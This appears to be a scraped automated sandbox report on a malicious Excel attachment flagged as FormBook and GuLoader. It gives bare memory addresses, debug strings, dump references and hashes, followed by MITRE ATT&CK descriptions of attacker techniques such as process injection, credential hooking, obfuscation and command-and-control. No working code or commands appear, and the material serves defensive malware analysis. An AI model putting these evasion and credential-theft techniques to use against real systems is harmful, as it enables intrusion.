0x1eb4ec9a
0x1eb4ec9a
0x1eb4ebd6
0x1eb4ebd6
0x00000000
0x1eb4ebbb
0x1eb82477
0x1eb8247c
0x1eb82486
0x1eb8248b
0x1eb82496
0x1eb8249b
0x1eb8249d
0x1eb824a0
0x1eb824a3
0x1eb824aa
0x1eb824aa
0x1eb824a5
0x1eb824a5
0x1eb824a5
0x1eb824ac
0x1eb824af
0x1eb824b0
0x1eb824b3
0x1eb824b9
0x1eb824ba
0x1eb824bb
0x1eb824c6
0x1eb824cb
0x1eb824cd
0x1eb824d0
0x1eb824d1
0x1eb824d4
0x1eb824d6
0x1eb824d9
0x1eb824d9
0x1eb824dc
0x1eb824df
0x1eb824e1
0x1eb824e7
0x1eb824e9
0x1eb824ec
0x1eb824ef
0x1eb824f2
0x1eb824f2
0x1eb824ef
0x1eb824e7
0x1eb824fa
0x1eb824ff
0x1eb82501
0x1eb82503
0x1eb82506
0x1eb8250b
0x1eb4eb8c
0x1eb4eb93
0x00000000
0x00000000
0x1eb4eb93
0x00000000
0x1eb4eb99
0x1eb4ec85
0x1eb4ec85
0x1eb4ec85
0x00000000

Strings

RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 1EB8248D
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 1EB824BD
RTL: Re-Waiting, xrefs: 1EB824FA

Memory Dump Source

Source File: 00000012.00000002.2239644796.000000001EB10000.00000040.00000001.sdmp, Offset: 1EB00000, based on PE: true

Associated: 00000012.00000002.2239623020.000000001EB00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240415310.000000001EBF0000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240454338.000000001EC00000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240506390.000000001EC04000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240547864.000000001EC07000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2240614036.000000001EC10000.00000040.00000001.sdmp Download File
Associated: 00000012.00000002.2241093624.000000001EC70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 35fe3ca4d4eed154cde99e6fc79a459cb87bca32f7e0f0e58c26d85f3f5ddae6
Instruction ID: 0dc3b57976e3bf1e8cdaf1a9674b6d61501a5f1ba33e5df5e0b2f010cfe48b6a
Opcode Fuzzy Hash: 35fe3ca4d4eed154cde99e6fc79a459cb87bca32f7e0f0e58c26d85f3f5ddae6
Instruction Fuzzy Hash: C141F074A04244ABCB10DB65CC94F9A7FA9EF84720F208B55F66A9B3D0D734F941CB60

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Required Order Quantity.xlsx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Required Order Quantity.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre